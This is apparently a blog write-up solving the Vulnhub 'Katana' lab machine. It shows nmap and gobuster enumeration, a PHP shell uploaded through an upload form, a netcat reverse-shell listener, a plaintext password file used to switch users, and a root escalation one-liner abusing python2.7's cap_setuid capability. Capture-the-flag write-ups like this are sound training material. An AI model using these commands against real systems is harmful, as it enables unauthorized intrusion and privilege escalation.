Vulnhub - Katana Writeup | 0xatom

Hi all, let’s pwn this box.

You can find the machine there > Katana

Let’s start as always with a nmap scan.

$ ip=192.168.1.9
$ nmap -sC -sV -p- -oN nmap.txt $ip
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-19 23:22 EEST
Nmap scan report for katana.zte.com.cn (192.168.1.9)
Host is up (0.00094s latency).
Not shown: 65527 closed ports
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 3.0.3
22/tcp   open  ssh         OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 89:4f:3a:54:01:f8:dc:b6:6e:e0:78:fc:60:a6:de:35 (RSA)
|   256 dd:ac:cc:4e:43:81:6b:e3:2d:f3:12:a1:3e:4b:a3:22 (ECDSA)
|_  256 cc:e6:25:c0:c6:11:9f:88:f6:c4:26:1e:de:fa:e9:8b (ED25519)
80/tcp   open  http        Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Katana X
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 4.9.5-Debian (workgroup: WORKGROUP)
7080/tcp open  ssl/http    LiteSpeed httpd
|_http-server-header: LiteSpeed
|_http-title: Katana X
| ssl-cert: Subject: commonName=katana/organizationName=webadmin/countryName=US
| Not valid before: 2020-05-11T13:57:36
|_Not valid after:  2022-05-11T13:57:36
|_ssl-date: 2020-05-19T20:23:01+00:00; +1s from scanner time.
| tls-alpn: 
|   h2
|   spdy/3
|   spdy/2
|_  http/1.1
8088/tcp open  http        LiteSpeed httpd
|_http-server-header: LiteSpeed
|_http-title: Katana X
8715/tcp open  http        nginx 1.14.2
| http-auth: 
| HTTP/1.1 401 Unauthorized\x0D
|_  Basic realm=Restricted Content
|_http-server-header: nginx/1.14.2
|_http-title: 401 Authorization Required
MAC Address: 00:0C:29:7E:18:F9 (VMware)
Service Info: Host: KATANA; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Lot of ports, i did enumeration on every port and i found an interesting upload function on port 8088, let’s run gobuster.

$ gobuster dir -u http://$ip:8088/ -w /usr/share/dirbuster//wordlists/directory-list-2.3-medium.txt -x php,txt,html -o gobuster.txt
/index.html (Status: 200)
/cgi-bin (Status: 301)
/img (Status: 301)
/docs (Status: 301)
/upload.html (Status: 200) <----
/upload.php (Status: 200)
/css (Status: 301)

Lets upload a shell.

When we upload a shell gives us this message :

Moved: /tmp/phpm2yZ8a ====> /opt/manager/html/katana_shell.php

If we try to execute this file says not found.

$ curl -s http://$ip:8088/katana_shell.php
<html>
  <head>
    <title>Page Not Found</title>
  </head>
<body bgcolor="#ffffff">
<hr>
<h1>Request Page Not Found</h1>
This is a customized error page for missing pages. 
<hr>
</body>
</html>

I coded a bash script for that, to search where the shell is.

ports='80 7080 8088 8715'
for data in $ports;do 
    curl -s -X GET http://$ip:$data/katana_shell.php
done

& one-liner

ports='80 7080 8088 8715'; for data in $ports; do curl -s -X GET http://$ip:$data/katana_shell.php; done

And we have shell!

$ nc -lvp 5555
listening on [any] 5555 ...
$ python -c 'import pty; pty.spawn("/bin/bash")'
www-data@katana:/$ whoami
whoami
www-data

We can privesc to katana user really easy, at his directory has the password.

www-data@katana:/home/katana$ cat .ssh_passwd
cat .ssh_passwd
katana@katana12345
www-data@katana:/home/katana$ su - katana
su - katana
Password: katana12345
katana@katana:~$ whoami
whoami
katana
katana@katana:~$ 

Now for root privesc, is a really interesting way, through capabilities!

Linux capabilities are something like the SUID, but can limit user’s permission and much more!

Let’s scan the file system for files with capabilities with getcap

katana@katana:~$ /sbin/getcap -r / 2>/dev/null
/sbin/getcap -r / 2>/dev/null
/usr/bin/ping = cap_net_raw+ep
/usr/bin/python2.7 = cap_setuid+ep

Bingo! python2.7 has the cap_setuid, let’s exploit it!

katana@katana:~$ python2.7 -c 'import os; os.setuid(0); os.system("/bin/bash")'
root@katana:~# cd /root
cd /root
root@katana:/root# cat root.txt
cat root.txt
{R00t_key_Katana_91!}

Easy one, See you!